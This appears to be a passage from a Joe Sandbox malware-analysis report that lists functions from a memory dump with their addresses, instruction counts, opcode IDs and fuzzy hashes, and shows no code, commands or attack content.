                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 714d9068413a15d54baa06f0215f7b8f7faa055332a3d3a9f78f6fd96219d885
                              • Instruction ID: a8b3869f541c521daf9ef4a883622f59bfa9583e11ffa425bbf6bc952540bc31
                              • Opcode Fuzzy Hash: 714d9068413a15d54baa06f0215f7b8f7faa055332a3d3a9f78f6fd96219d885
                              • Instruction Fuzzy Hash: 64013730B0854E8FDB58DF55C4516AA73A1FF98314F148239D41AD3294CE74E8418B40
                              Function 00007FFD9BAD7F74 Relevance: .1, Instructions: 52COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a51dd0011eb4ab411c638f1dd8da419288ac43179341452b319ad0345c223f16
                              • Instruction ID: 8cb2bdde7231766a71cde2716e623543570959a0de55d9ce989b90ef42989fb4
                              • Opcode Fuzzy Hash: a51dd0011eb4ab411c638f1dd8da419288ac43179341452b319ad0345c223f16
                              • Instruction Fuzzy Hash: E211A031A1A55E4FDB55EBB8C865AEDB7F0BF84314F4401B9D00AE71A3DE686900C710
                              Function 00007FFD9BB24608 Relevance: .1, Instructions: 51COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 28b70374078bab3fdff8666fa376fe56216e0e36cdb4dbfbede26f3000fd8806
                              • Instruction ID: 8c7599a69a6b1842c3d3ecadf91242a30380cd3e231406d2fbfcb5244c338821
                              • Opcode Fuzzy Hash: 28b70374078bab3fdff8666fa376fe56216e0e36cdb4dbfbede26f3000fd8806
                              • Instruction Fuzzy Hash: 47119120A1DB9949FF7587A890643756BC06F3530CF4944ACC4EB826D6CA9DBA89C341
                              Function 00007FFD9BAE140D Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da487bb7fc01bbcbee7445fbb4c8b91530263a0e74d06c994eb27cbeae8268cb
                              • Instruction ID: 1e966d183a7daf361e16c9df81334bd9f304e7bff1da7a3e68db2e14314d1fcd
                              • Opcode Fuzzy Hash: da487bb7fc01bbcbee7445fbb4c8b91530263a0e74d06c994eb27cbeae8268cb
                              • Instruction Fuzzy Hash: 08012D72A0EB890BF321973498205E57BD1EBE1260F49077AD1D1CB1F1ED59524B4792
                              Function 00007FFD9BAD7388 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1289a5b0c8893f2eb67de03a7b8242ac9b582a7444bc4bbd2a4c7d7d29d1f832
                              • Instruction ID: 3eac7071ae79fe28ee2856aa87d87feb7a6046e7411fc652b5ae7f5a5d0cab09
                              • Opcode Fuzzy Hash: 1289a5b0c8893f2eb67de03a7b8242ac9b582a7444bc4bbd2a4c7d7d29d1f832
                              • Instruction Fuzzy Hash: 2E012622A0F3C81FE326967A4C694E63F70DF5321470902ABF0D4CA0A3E81468058351
                              Function 00007FFD9BB2DE60 Relevance: .0, Instructions: 50COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d558a55a236d4b7a29b1692fece81ca79e378f6d243d452a5dd33df492469bcd
                              • Instruction ID: 60ed8d444c0fe32515c4f0a5b1f4445de13c02d39ed17c2f55706b729a590c1e
                              • Opcode Fuzzy Hash: d558a55a236d4b7a29b1692fece81ca79e378f6d243d452a5dd33df492469bcd
                              • Instruction Fuzzy Hash: 38F0C811B0E92E0FDBB8E69CB4A42B575C1FFA822174500BAD45DC71E5E9198DC143C0
                              Function 00007FFD9BB11290 Relevance: .0, Instructions: 48COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b18972f3804ee83f57afb8e93eda0c9fa3d0d2e4f09947895e1815e05adb477e
                              • Instruction ID: 30e7d87c2a51e65683bc1a7a36d98289bc89209d09ec988c3213d82449b8d5de
                              • Opcode Fuzzy Hash: b18972f3804ee83f57afb8e93eda0c9fa3d0d2e4f09947895e1815e05adb477e
                              • Instruction Fuzzy Hash: 35F06D30B15E0D4FE7A8EAAD9494A7276D2FBAC316714017DD00DC33A6DD66EC428380
                              Function 00007FFD9BADEAA4 Relevance: .0, Instructions: 48COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 95a03330083a734605ecc0b362534d50d35b80f5e874069dcdf768dd40dc1d30
                              • Instruction ID: 0e70e3543fb01a8415076b02102ef8dd2b7f64bbfaa969129f8e987b98a7c5c4
                              • Opcode Fuzzy Hash: 95a03330083a734605ecc0b362534d50d35b80f5e874069dcdf768dd40dc1d30
                              • Instruction Fuzzy Hash: 2EF02B7160EA0D5EFF589B49EC26AF63794FB86334F05012DF44DC1062E662A923C254
                              Function 00007FFD9BAD17E9 Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7a5e79ca199149042c7d87600d2d93e3be2c633025796fcb44971b00f6aa30f8
                              • Instruction ID: 95d4b269cbab5c81e09300b198192e498acc87e4820f37faaf297c293b73a498
                              • Opcode Fuzzy Hash: 7a5e79ca199149042c7d87600d2d93e3be2c633025796fcb44971b00f6aa30f8
                              • Instruction Fuzzy Hash: C001D43160DB895FC795D718D0605EABFE1EFD9320F45067EF089C72A1CE609A40C782
                              Function 00007FFD9BB18D50 Relevance: .0, Instructions: 47COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 27517388db24be9d0c2cb55dadf6030f4daa45c40ba6d23929d100338d8e600f
                              • Instruction ID: f3112f8a4eeffa6bde1e8b717adde124a1fc234803b3b4dd4c251081942e87eb
                              • Opcode Fuzzy Hash: 27517388db24be9d0c2cb55dadf6030f4daa45c40ba6d23929d100338d8e600f
                              • Instruction Fuzzy Hash: ACF0B730705C0E8FDAA4EB1DE868A2573E6FFA931175A01A6E40DC72A9DE64DC418781
                              Function 00007FFD9BAE062D Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 509993581c601361b118223d1dc1a5812286871f76535bf36dcbda258be9c478
                              • Instruction ID: 159424669e95f69c63ceca59018bd439d382e26bfd9d280d32efa44347008e1d
                              • Opcode Fuzzy Hash: 509993581c601361b118223d1dc1a5812286871f76535bf36dcbda258be9c478
                              • Instruction Fuzzy Hash: EA01403251EB8D0BF330977098265D67BD1EBD1320F05077ED091871F1EEA856098783
                              Function 00007FFD9BAD7CBC Relevance: .0, Instructions: 45COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31ab968d409f3b82f30ef62ad3477502de86eb778d94c0d2e3c793de1fb13431
                              • Instruction ID: 7cfb9a654afda87f90fad6641c18e34f302f8e47aa871663dcd7ee1695dab814
                              • Opcode Fuzzy Hash: 31ab968d409f3b82f30ef62ad3477502de86eb778d94c0d2e3c793de1fb13431
                              • Instruction Fuzzy Hash: 41F0D172E0A90D4EDB94EBA884661ED7BE0EF88300F404176E45DE229ADE3819014B82
                              Function 00007FFD9BAD1800 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ab84d9100bdc9656f1362c22f4175b2bae37edc3944938c6c4f12fa7580e517
                              • Instruction ID: c1795f67c7de5a8d9d859bc585030cd298530c6d10996edb899813e4dd550b3a
                              • Opcode Fuzzy Hash: 2ab84d9100bdc9656f1362c22f4175b2bae37edc3944938c6c4f12fa7580e517
                              • Instruction Fuzzy Hash: C0F0AF3260DB4D4BD7A8DB08D464AAAB7D1FFD8350F84063EF04AD33A0CEA199408782
                              Function 00007FFD9BB1A576 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 36d7f0f8f563c76cc13614f0744844d741aff421a1f28153cf43a6fb0acdf808
                              • Instruction ID: 3676e8782984a24cf8b73405968999f16cc753edcc885ac333f608869216b1df
                              • Opcode Fuzzy Hash: 36d7f0f8f563c76cc13614f0744844d741aff421a1f28153cf43a6fb0acdf808
                              • Instruction Fuzzy Hash: 00F09E7250F61C0FF7289A05DC076F67794FB87334F00019EE19D810A2E5223553C641
                              Function 00007FFD9BAD7CC0 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8e93d7a4e2a6d7e0a831478c6ad4a34aece3e0302a3e41d9c59232474d5b58be
                              • Instruction ID: 499e5e9f5f7f09908b3308111308e45873e0adb039edc40a0c30a90102324d24
                              • Opcode Fuzzy Hash: 8e93d7a4e2a6d7e0a831478c6ad4a34aece3e0302a3e41d9c59232474d5b58be
                              • Instruction Fuzzy Hash: B6F0AF71E0590D4FDB94ABA894566EE7BE0EF48304F404176E41DE3299DE3519414BC2
                              Function 00007FFD9BAF0A08 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6bcc1c652466b4d6556ce9e9dad8c44a30ecbfb29b55b63a4fd333c877eb480
                              • Instruction ID: af30334086dda2f8193dec405700b0d4fb8c07f3bbded172135b286f4411bd68
                              • Opcode Fuzzy Hash: f6bcc1c652466b4d6556ce9e9dad8c44a30ecbfb29b55b63a4fd333c877eb480
                              • Instruction Fuzzy Hash: AEF02B3120CA4C4BC790EB18E4049E673D1FBD4314F40097BE84DD72A4D939DA41C7C1
                              Function 00007FFD9BAEC1F0 Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c67de05a74266e951c6f2d060e45c21e65afb93c776e94a6ae51649d04ec137
                              • Instruction ID: 6fc76aab479bdd7cd422485afb42e47a99085711dd7d2f26d137eefbc72da47b
                              • Opcode Fuzzy Hash: 2c67de05a74266e951c6f2d060e45c21e65afb93c776e94a6ae51649d04ec137
                              • Instruction Fuzzy Hash: B0F06230A19E0E4BDA79D6748064772B2E1FF58304F115978D05FC21E8CE24F9858740
                              Function 00007FFD9BB24568 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3fdf529d9b5ee8443423163b5bf29d01b9806fb9f5cd3e3aced15d22a265af0
                              • Instruction ID: f7e36df7cc4645bbbe4a0d3b6511041ae99c1f6bd0a326e15205e3ff63d0791c
                              • Opcode Fuzzy Hash: a3fdf529d9b5ee8443423163b5bf29d01b9806fb9f5cd3e3aced15d22a265af0
                              • Instruction Fuzzy Hash: 5EF04F30B2A90E8FEEA4EA6CC46092573E0FF6834876545B8D81ECB1F5E916FC42C700
                              Function 00007FFD9BAE15A0 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eddede6c8e847bd6628943e9521b00871a2c8862f397523cde9860acefca32bb
                              • Instruction ID: d3f4ac7d27ce8ef43e57f2be6aabee55317d474c0db051f55e8a7295b4ebbad4
                              • Opcode Fuzzy Hash: eddede6c8e847bd6628943e9521b00871a2c8862f397523cde9860acefca32bb
                              • Instruction Fuzzy Hash: DBF0C831A2CA094EE754FB3C841467EB6D0FF8C319F040A3AE88DD21A4EE28D6804682
                              Function 00007FFD9BAE6978 Relevance: .0, Instructions: 41COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: acb20b2fb35dd3429931cfc3683394717d4a2268e9ec9322030c91b9a92e68ab
                              • Instruction ID: a62e5d395f4a2551850d2d00f95b0a101eee9a5a5fcc1432a64483ea8d6138db
                              • Opcode Fuzzy Hash: acb20b2fb35dd3429931cfc3683394717d4a2268e9ec9322030c91b9a92e68ab
                              • Instruction Fuzzy Hash: BCF0FC31A1DB1D4BE754BB78441457ABBD0FF88319F050A7BB88DD21B5EE28D6804682
                              Function 00007FFD9BAEA6FD Relevance: .0, Instructions: 40COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f4ae55ddb559b84805b833e83924c6b60486dd840b1e577ff0449f9dac170fb5
                              • Instruction ID: 19cebb62e498fd7b492c77954ab2dbe2d1ab9ceb52c2d0fe9934320e9402df88
                              • Opcode Fuzzy Hash: f4ae55ddb559b84805b833e83924c6b60486dd840b1e577ff0449f9dac170fb5
                              • Instruction Fuzzy Hash: 65E02B01B1E81E07E274B2EE24991FE4385DFFC2357594177E05DC62E2DC485C478250
                              Function 00007FFD9BAEC927 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 83ca3747f56b3915344f7b78b924c47a5d9c30bb22d800194330373264fac803
                              • Instruction ID: 91a35c50435ec291d603beed8c2f52cdf2261379c13ace56d675f9a16b32107e
                              • Opcode Fuzzy Hash: 83ca3747f56b3915344f7b78b924c47a5d9c30bb22d800194330373264fac803
                              • Instruction Fuzzy Hash: C2F0BB7361E95A07E774966D14A506927C1EBE936032601BBC049471E3EC4D5C038280
                              Function 00007FFD9BAD7AF5 Relevance: .0, Instructions: 38COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb460209e7916705d057a007c862523b44bfdfe9d5d7f6c0853827aa9483f4ae
                              • Instruction ID: 443c71cef50674cd6752a4151c61c15165ac37f3368e2eac53fb65a4320d650b
                              • Opcode Fuzzy Hash: bb460209e7916705d057a007c862523b44bfdfe9d5d7f6c0853827aa9483f4ae
                              • Instruction Fuzzy Hash: 82F06D62A0F7CD5EDB6357A848310D83F70AE83610B4A02E3D5D4DB0F3D6582A09C362
                              Function 00007FFD9BAD80F8 Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e0c9405bb56b11627e086a2146bf07130571ebfa4104b903ce71baa4ea996603
                              • Instruction ID: 0bc77454eef019274f7ad25bca5fd206ab223d50322dcf5d3cb30d2eb79c4094
                              • Opcode Fuzzy Hash: e0c9405bb56b11627e086a2146bf07130571ebfa4104b903ce71baa4ea996603
                              • Instruction Fuzzy Hash: C0F0CD32B2545D4FDB58E7A8C861AFDB3B1BF98205F8501B5E409E71B3CE686A048751
                              Function 00007FFD9BAE95C9 Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b855182dcba280c8d75ba1b56bac72fa71cb0cdd4b40f922be8eff902cbeee5e
                              • Instruction ID: 06b63e170b511b18d8d661f7fd5822e8298941e42ea2cf57b413df73a31527bb
                              • Opcode Fuzzy Hash: b855182dcba280c8d75ba1b56bac72fa71cb0cdd4b40f922be8eff902cbeee5e
                              • Instruction Fuzzy Hash: D5F0B451A1FB8A5FE3A5B37814361BCB5D0AF45224B4605FAE04CC70E3DC5C0D058211
                              Function 00007FFD9BAE9BD0 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a7c0c7d5d0a1493d206aab2d6dacd35028db7cd8bf9e1a3d5d44b90a19441e16
                              • Instruction ID: 2891cb699e16549651dfde6d4e77354a33d072fb3e9110f32ae7eaa8fc2198c8
                              • Opcode Fuzzy Hash: a7c0c7d5d0a1493d206aab2d6dacd35028db7cd8bf9e1a3d5d44b90a19441e16
                              • Instruction Fuzzy Hash: AEF0E900E0DEAE05F7B661B928583B969C0BF20314F4914B6DCAAC55D1DD8CFEC54381
                              Function 00007FFD9BAD73A0 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a8609d5dad52342374d5e6b1695e18d37d671d6f087a6d78a7b5491ab52b9c0d
                              • Instruction ID: 403446a35fb677fdb96f305c9bc4aebf9db6ac4a677a89943cfe38252658732e
                              • Opcode Fuzzy Hash: a8609d5dad52342374d5e6b1695e18d37d671d6f087a6d78a7b5491ab52b9c0d
                              • Instruction Fuzzy Hash: E3F0E23150F3C82FD76697368C2A8A63F74EE5321070A01DBF0C4CB0A3E4546C04C361
                              Function 00007FFD9BAE68C9 Relevance: .0, Instructions: 36COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f4081d14ef71652a62bab1ffb91a031f5150383ff8531d9c715e11b856ed741
                              • Instruction ID: 1fe6e12ae497a16a12479bbdfc8c06efb8c640d4dd3c104b42f09a52db7e3b26
                              • Opcode Fuzzy Hash: 8f4081d14ef71652a62bab1ffb91a031f5150383ff8531d9c715e11b856ed741
                              • Instruction Fuzzy Hash: A1F0582060E3C80FD713AB745C654A57FB09E47150F0E46EBD8C8CB0B3EA5C9A8AC312
                              Function 00007FFD9BAD1A80 Relevance: .0, Instructions: 30COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce2ccc3834a90025a1eb054f74fdd4c8b2b3c1e5233ddbe959ae160bab64de40
                              • Instruction ID: fb22badeae7eeee8d1433f42bfba9f67721ff68970b8887ce53ec6a6fd21a4ca
                              • Opcode Fuzzy Hash: ce2ccc3834a90025a1eb054f74fdd4c8b2b3c1e5233ddbe959ae160bab64de40
                              • Instruction Fuzzy Hash: 8EE0C071E0DB4C4FDF50AB9DA8345D83BA0FFC5314F040069F01CC3290D6215A50C341
                              Function 00007FFD9BAD09AD Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1fb07ab14b8a4964597cfc65d1dfdc666c16d2f51b2d0cf0fb20ec65ed5e1a64
                              • Instruction ID: 958a84d97f0bd86f22ba0ee33f60536af6aaf2db04b10e54a316815698d519c9
                              • Opcode Fuzzy Hash: 1fb07ab14b8a4964597cfc65d1dfdc666c16d2f51b2d0cf0fb20ec65ed5e1a64
                              • Instruction Fuzzy Hash: 91E0C222F4680E09EB24B3B42C3A9FDF299DFC8218FC20971E01DC20CBCD5929154181
                              Function 00007FFD9BAE48C8 Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                              • Instruction ID: e5965208f877094447507044449f839a821f1d2bd8a8e75c1a70ada562594516
                              • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                              • Instruction Fuzzy Hash: C8D01772F0E51D5CF568A38874231FC7388EF82234A92003FD28F825B2AC8E3212118A
                              Function 00007FFD9BAD0CFD Relevance: .0, Instructions: 25COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 886f27523a047f1f5a740b7e9cd71d59e943b578767e433b858897b1e4baa529
                              • Instruction ID: 00e8da02c58b0c4c7a4f2eb67657ced809df25767409abcc067faf20571d235d
                              • Opcode Fuzzy Hash: 886f27523a047f1f5a740b7e9cd71d59e943b578767e433b858897b1e4baa529
                              • Instruction Fuzzy Hash: 08E0C222F5580E09EB54B3B42C3A9FDF249DFC8218BC10972E41DC20CBCD5929158181
                              Function 00007FFD9BAE7360 Relevance: .0, Instructions: 23COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e622298edd6d791495b2766822398563c4a876d5dcecad5d8849d2b245a98c18
                              • Instruction ID: b46748e683eda8656a124bb9474272202a9f2bfda9e551510b053b90ae82aa7a
                              • Opcode Fuzzy Hash: e622298edd6d791495b2766822398563c4a876d5dcecad5d8849d2b245a98c18
                              • Instruction Fuzzy Hash: 9CE08C30609A084B8748EA2C848C92BBFE4DBEC365F180B3FB40CD3270DA7086808789
